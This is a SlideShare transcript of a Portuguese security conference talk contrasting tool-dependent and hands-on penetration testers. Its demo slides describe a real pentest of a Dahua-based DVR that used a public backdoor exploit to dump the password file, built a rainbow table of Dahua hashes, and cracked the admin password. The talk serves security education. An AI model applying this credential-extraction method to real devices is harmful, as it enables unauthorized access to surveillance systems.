SlideShare uma empresa Scribd logo
1 de 19
Pentester Raiz x Pentester Nutella.
William Costa
twitter @willcosta
william.costa arroba gmail.com
Pentester Raiz x Pentester Nutella.
Consultor em Segurança da Informação.
CISSP, C|EH, E|CSA, CPT, CEPT, LPI.
Palestras ministrada em H2HC,BHACK, MindtheSec, LACSEC, Co0L BSidesSP, CSM, TDC.
William Costa
Pentester Raiz x Pentester Nutella.
Pentester Raiz Pentester Nutella
Pentester Raiz x Pentester Nutella.
Reconnaissance
Pentester Nutella
PeekYou
Lullar
Recon-ng
Google Hack
Engenharia Social
Pentester Raiz
Dumpster Diving
Pentester Raiz x Pentester Nutella.
Scanning
Pentester Nutella
Qualys
Nessus
Acunetix
NMAP
OPENVAS
Pentester Raiz
Script
Pentester Raiz x Pentester Nutella.
Gaining Access
Pentester Nutella
Canvas Immunity
Core Impact
Pythem
Metasploit
Pentester Raiz
Compila a mão
Pentester Raiz x Pentester Nutella.
Demo
Irei demostrar o perigo de um Pentester Nutella.
Esse foi um pentest real realizado em uma empresa em um sistema de CFTV (DVR)
Pentester Raiz x Pentester Nutella.
Resultado do Scan com Retina
Pentester Raiz x Pentester Nutella.
Para um Pentester Nutella Seria o Fim.
Pentester Raiz x Pentester Nutella.
Vamos analisar os códigos da pagina de Autenticação, mais
especificamente o arquivo : /js/index.js
Temos a variável que aponta para um serviço de DDNS da DAHUA um fabricante chinês de DVR,
o que indica que a intelbras apenas modifica os logos para os seus, mas mantém o código da
DAHUA.
...var c="http://www.dahuaddns.com", ...
http://www.dahuasecurity.com/
Pentester Raiz x Pentester Nutella.
“Googando” temos mais de 51K resultados sobre
vulnerabilidades nos produtos dessa empresa
Incluído uma que permite ter acesso via um backdoor:
https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
Pentester Raiz x Pentester Nutella.
Testando o backdoor...
sem sucesso...
Aparentemente o Intelbras
vez alguma coisa...
O Pentester Nutella já teria
desistio, mas não Josef
climber, ops quer dizer o
Pentester Raiz.
Pentester Raiz x Pentester Nutella.
Analisando Exploit, podemos ver que ele faz um
get do arquivo /current_config/passwd, que tem
a seguinte saída no nosso alvo:
## UGM 1.5
#id:name:passwd:groupid:authority:memo:share:bandlimit:mac:timesection:onlinetimeout:starttime:endtime:PasswordModifiedTime
#
1:admin:NtXqck4u:1:CtrPanel, ShutDown, Monitor, Monitor_01...
2:default:F3rxahJK:2:Monitor, Monitor_01...
3:pps:c1IZlmFo:1:Account, GeneralConf...
4:eddr:CPl7JVrg:1:Account, GeneralConf...
5:edmo:eEUXFpyp:1:CtrPanel, ShutDown, Monitor, Monitor_01, Monitor_02...
Pentester Raiz x Pentester Nutella.
Agora já temos acesso ao HASHs das senhas e
os usuários, vamos para o decrypt.
Encontrei um script em python que gera o hash a
partir da senha, desta forma criei uma Rainbow
Table de HASHS das senhas do DAHUA.
https://github.com/haicen/DahuaHashCreator/blob/master/DahuaHash.py
Pentester Raiz x Pentester Nutella.
000000 = qAj0oSP1
000001 = 88wL9sCX
000002 = A88aH60e
000003 = elgknAM0
000004 = 6zBtKK87
000005 = RaRu4qjT
000006 = I1mw4Gcd
000007 = RvtqLumX
000008 = 46awoS19
000009 = gHl75vSy
...
999990 = YYRdkMpH
999991 = 8GnrRukK
999992 = nEcsZDU9
999993 = xWQBTpDH
999994 = ShZHBBV2
999995 = 1ddhP4Fo
999996 = ea1kCUus
999997 = 3XaIFSxT
999998 = LJYigQTo
Na primeira tentativa foi gerado
apenas HASHs a patir de senhas
numéricas de 0 a 999999
Pentester Raiz x Pentester Nutella.
Após executar encontramos a
senha do usuário admin :
878632 = NtXqck4u
Pentester Raiz x Pentester Nutella.
Agora que temos a senha, basta testar o
acesso.
Pentester Raiz x Pentester Nutella.
Pentester Nutella
Conclução
• Quem quer iniciar na aréa de teste de intrusão deve saber que as
ferramentas são apenas facilitadores e não a unica forma de relizar
um Pentest.
E o Principal:
Rodar ferramentas não lhe torna um
“HACKER”

Mais conteúdo relacionado

Semelhante a Palestra William Costa - Pentester Raiz vs Pentester Goumert

Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoCleórbete Santos
 
Aula 01 python
Aula 01 pythonAula 01 python
Aula 01 pythonTiago
 
Sinfonier, Campus Party Recife 2014
Sinfonier, Campus Party Recife 2014Sinfonier, Campus Party Recife 2014
Sinfonier, Campus Party Recife 2014Leandro Bennaton
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Bravo Tecnologia
 
Tutorial de Configuranção do TRUECRYPT no Pen Drive
Tutorial de Configuranção do TRUECRYPT no Pen DriveTutorial de Configuranção do TRUECRYPT no Pen Drive
Tutorial de Configuranção do TRUECRYPT no Pen DriveDiego Souza
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoAs Zone
 
Facsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um poucoFacsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um poucoThiago Dieb
 
Monitoramento funcional e não funcional em containers
Monitoramento funcional e não funcional em containersMonitoramento funcional e não funcional em containers
Monitoramento funcional e não funcional em containersRenan Petronilho Sant Anna
 
Treta Hunting - Cris Barbosa
Treta Hunting - Cris BarbosaTreta Hunting - Cris Barbosa
Treta Hunting - Cris BarbosaTest Girls
 
Trabalho sobre truecrypt
Trabalho sobre truecryptTrabalho sobre truecrypt
Trabalho sobre truecryptCassio Ramos
 
Nessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de AtaquesNessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de AtaquesAndre Peres
 
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...Luiz Arthur
 
Examinando redes com Nmap
Examinando redes com NmapExaminando redes com Nmap
Examinando redes com NmapDaniel Marques
 
Palestra ganeti puppet
Palestra ganeti puppetPalestra ganeti puppet
Palestra ganeti puppetDaniel Sobral
 
Machine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ceMachine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ceLuca Bastos
 
Crackeando aplicativos no android _by c0_m3nd4d0r
Crackeando aplicativos no android  _by c0_m3nd4d0rCrackeando aplicativos no android  _by c0_m3nd4d0r
Crackeando aplicativos no android _by c0_m3nd4d0rnunes666
 

Semelhante a Palestra William Costa - Pentester Raiz vs Pentester Goumert (20)

Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetração
 
Aula 01 python
Aula 01 pythonAula 01 python
Aula 01 python
 
Sinfonier, Campus Party Recife 2014
Sinfonier, Campus Party Recife 2014Sinfonier, Campus Party Recife 2014
Sinfonier, Campus Party Recife 2014
 
Ransomware como proteger sua empresa
Ransomware como proteger sua empresa Ransomware como proteger sua empresa
Ransomware como proteger sua empresa
 
Tutorial de Configuranção do TRUECRYPT no Pen Drive
Tutorial de Configuranção do TRUECRYPT no Pen DriveTutorial de Configuranção do TRUECRYPT no Pen Drive
Tutorial de Configuranção do TRUECRYPT no Pen Drive
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um poucoPalestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
Palestra - FACSENAC - De Hacker e louco, todo mundo tem um pouco
 
Facsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um poucoFacsenac - De hacker e louco, todo mundo tem um pouco
Facsenac - De hacker e louco, todo mundo tem um pouco
 
Monitoramento funcional e não funcional em containers
Monitoramento funcional e não funcional em containersMonitoramento funcional e não funcional em containers
Monitoramento funcional e não funcional em containers
 
Treta Hunting - Cris Barbosa
Treta Hunting - Cris BarbosaTreta Hunting - Cris Barbosa
Treta Hunting - Cris Barbosa
 
Trabalho sobre truecrypt
Trabalho sobre truecryptTrabalho sobre truecrypt
Trabalho sobre truecrypt
 
Nessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de AtaquesNessus e Metaesploit - Prática de Ataques
Nessus e Metaesploit - Prática de Ataques
 
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...
Slides - Uma abordagem autonômica para mitigar ciberataques em redes de compu...
 
Examinando redes com Nmap
Examinando redes com NmapExaminando redes com Nmap
Examinando redes com Nmap
 
Palestra ganeti puppet
Palestra ganeti puppetPalestra ganeti puppet
Palestra ganeti puppet
 
Aula de seguranca (1)
Aula de seguranca (1)Aula de seguranca (1)
Aula de seguranca (1)
 
Machine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ceMachine learning java ce conference 2012 - fortaleza ce
Machine learning java ce conference 2012 - fortaleza ce
 
Python e suas aplicações
Python e suas aplicaçõesPython e suas aplicações
Python e suas aplicações
 
Backtrack 4 Falando sobre Pentesting
Backtrack 4 Falando sobre PentestingBacktrack 4 Falando sobre Pentesting
Backtrack 4 Falando sobre Pentesting
 
Crackeando aplicativos no android _by c0_m3nd4d0r
Crackeando aplicativos no android  _by c0_m3nd4d0rCrackeando aplicativos no android  _by c0_m3nd4d0r
Crackeando aplicativos no android _by c0_m3nd4d0r
 

Mais de BHack Conference

Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...
Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...
Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...BHack Conference
 
Palestra Murilo Santana - Ownando sistemas por uma porta USB
Palestra Murilo Santana - Ownando sistemas por uma porta USBPalestra Murilo Santana - Ownando sistemas por uma porta USB
Palestra Murilo Santana - Ownando sistemas por uma porta USBBHack Conference
 
Palestra Filipi Pires - Ransomware – Existe proteção para isso?
Palestra Filipi Pires - Ransomware – Existe proteção para isso?Palestra Filipi Pires - Ransomware – Existe proteção para isso?
Palestra Filipi Pires - Ransomware – Existe proteção para isso?BHack Conference
 
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...BHack Conference
 
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...BHack Conference
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Palestra Lucas França - 802.1x e 802.1ae
Palestra Lucas França - 802.1x e 802.1aePalestra Lucas França - 802.1x e 802.1ae
Palestra Lucas França - 802.1x e 802.1aeBHack Conference
 
Palestra Walter Capanema - Liberdade de expressão na internet
Palestra Walter Capanema - Liberdade de expressão na internet Palestra Walter Capanema - Liberdade de expressão na internet
Palestra Walter Capanema - Liberdade de expressão na internet BHack Conference
 
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...BHack Conference
 
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...BHack Conference
 

Mais de BHack Conference (10)

Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...
Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...
Palestra Daniel Peres - Modelo de Responsabilidade compartilhada AWS e as imp...
 
Palestra Murilo Santana - Ownando sistemas por uma porta USB
Palestra Murilo Santana - Ownando sistemas por uma porta USBPalestra Murilo Santana - Ownando sistemas por uma porta USB
Palestra Murilo Santana - Ownando sistemas por uma porta USB
 
Palestra Filipi Pires - Ransomware – Existe proteção para isso?
Palestra Filipi Pires - Ransomware – Existe proteção para isso?Palestra Filipi Pires - Ransomware – Existe proteção para isso?
Palestra Filipi Pires - Ransomware – Existe proteção para isso?
 
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
Palestra Tony Rodrigues - OctaneLabs WarpSpeed Project – Computação Forense e...
 
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...
Palestra Pedro Lopes e Victor Martins - Incidentes na Segurança da Informação...
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Palestra Lucas França - 802.1x e 802.1ae
Palestra Lucas França - 802.1x e 802.1aePalestra Lucas França - 802.1x e 802.1ae
Palestra Lucas França - 802.1x e 802.1ae
 
Palestra Walter Capanema - Liberdade de expressão na internet
Palestra Walter Capanema - Liberdade de expressão na internet Palestra Walter Capanema - Liberdade de expressão na internet
Palestra Walter Capanema - Liberdade de expressão na internet
 
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...
Palestra Regilberto Girão - Segurança digital em camadas – Digital layered se...
 
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
Palestra Rafael Correia - O que eu deveria ter aprendido sobre segurança na g...
 

Palestra William Costa - Pentester Raiz vs Pentester Goumert

  • 1. Pentester Raiz x Pentester Nutella. William Costa twitter @willcosta william.costa arroba gmail.com
  • 2. Pentester Raiz x Pentester Nutella. Consultor em Segurança da Informação. CISSP, C|EH, E|CSA, CPT, CEPT, LPI. Palestras ministrada em H2HC,BHACK, MindtheSec, LACSEC, Co0L BSidesSP, CSM, TDC. William Costa
  • 3. Pentester Raiz x Pentester Nutella. Pentester Raiz Pentester Nutella
  • 4. Pentester Raiz x Pentester Nutella. Reconnaissance Pentester Nutella PeekYou Lullar Recon-ng Google Hack Engenharia Social Pentester Raiz Dumpster Diving
  • 5. Pentester Raiz x Pentester Nutella. Scanning Pentester Nutella Qualys Nessus Acunetix NMAP OPENVAS Pentester Raiz Script
  • 6. Pentester Raiz x Pentester Nutella. Gaining Access Pentester Nutella Canvas Immunity Core Impact Pythem Metasploit Pentester Raiz Compila a mão
  • 7. Pentester Raiz x Pentester Nutella. Demo Irei demostrar o perigo de um Pentester Nutella. Esse foi um pentest real realizado em uma empresa em um sistema de CFTV (DVR)
  • 8. Pentester Raiz x Pentester Nutella. Resultado do Scan com Retina
  • 9. Pentester Raiz x Pentester Nutella. Para um Pentester Nutella Seria o Fim.
  • 10. Pentester Raiz x Pentester Nutella. Vamos analisar os códigos da pagina de Autenticação, mais especificamente o arquivo : /js/index.js Temos a variável que aponta para um serviço de DDNS da DAHUA um fabricante chinês de DVR, o que indica que a intelbras apenas modifica os logos para os seus, mas mantém o código da DAHUA. ...var c="http://www.dahuaddns.com", ... http://www.dahuasecurity.com/
  • 11. Pentester Raiz x Pentester Nutella. “Googando” temos mais de 51K resultados sobre vulnerabilidades nos produtos dessa empresa Incluído uma que permite ter acesso via um backdoor: https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
  • 12. Pentester Raiz x Pentester Nutella. Testando o backdoor... sem sucesso... Aparentemente o Intelbras vez alguma coisa... O Pentester Nutella já teria desistio, mas não Josef climber, ops quer dizer o Pentester Raiz.
  • 13. Pentester Raiz x Pentester Nutella. Analisando Exploit, podemos ver que ele faz um get do arquivo /current_config/passwd, que tem a seguinte saída no nosso alvo: ## UGM 1.5 #id:name:passwd:groupid:authority:memo:share:bandlimit:mac:timesection:onlinetimeout:starttime:endtime:PasswordModifiedTime # 1:admin:NtXqck4u:1:CtrPanel, ShutDown, Monitor, Monitor_01... 2:default:F3rxahJK:2:Monitor, Monitor_01... 3:pps:c1IZlmFo:1:Account, GeneralConf... 4:eddr:CPl7JVrg:1:Account, GeneralConf... 5:edmo:eEUXFpyp:1:CtrPanel, ShutDown, Monitor, Monitor_01, Monitor_02...
  • 14. Pentester Raiz x Pentester Nutella. Agora já temos acesso ao HASHs das senhas e os usuários, vamos para o decrypt. Encontrei um script em python que gera o hash a partir da senha, desta forma criei uma Rainbow Table de HASHS das senhas do DAHUA. https://github.com/haicen/DahuaHashCreator/blob/master/DahuaHash.py
  • 15. Pentester Raiz x Pentester Nutella. 000000 = qAj0oSP1 000001 = 88wL9sCX 000002 = A88aH60e 000003 = elgknAM0 000004 = 6zBtKK87 000005 = RaRu4qjT 000006 = I1mw4Gcd 000007 = RvtqLumX 000008 = 46awoS19 000009 = gHl75vSy ... 999990 = YYRdkMpH 999991 = 8GnrRukK 999992 = nEcsZDU9 999993 = xWQBTpDH 999994 = ShZHBBV2 999995 = 1ddhP4Fo 999996 = ea1kCUus 999997 = 3XaIFSxT 999998 = LJYigQTo Na primeira tentativa foi gerado apenas HASHs a patir de senhas numéricas de 0 a 999999
  • 16. Pentester Raiz x Pentester Nutella. Após executar encontramos a senha do usuário admin : 878632 = NtXqck4u
  • 17. Pentester Raiz x Pentester Nutella. Agora que temos a senha, basta testar o acesso.
  • 18. Pentester Raiz x Pentester Nutella.
  • 19. Pentester Nutella Conclução • Quem quer iniciar na aréa de teste de intrusão deve saber que as ferramentas são apenas facilitadores e não a unica forma de relizar um Pentest. E o Principal: Rodar ferramentas não lhe torna um “HACKER”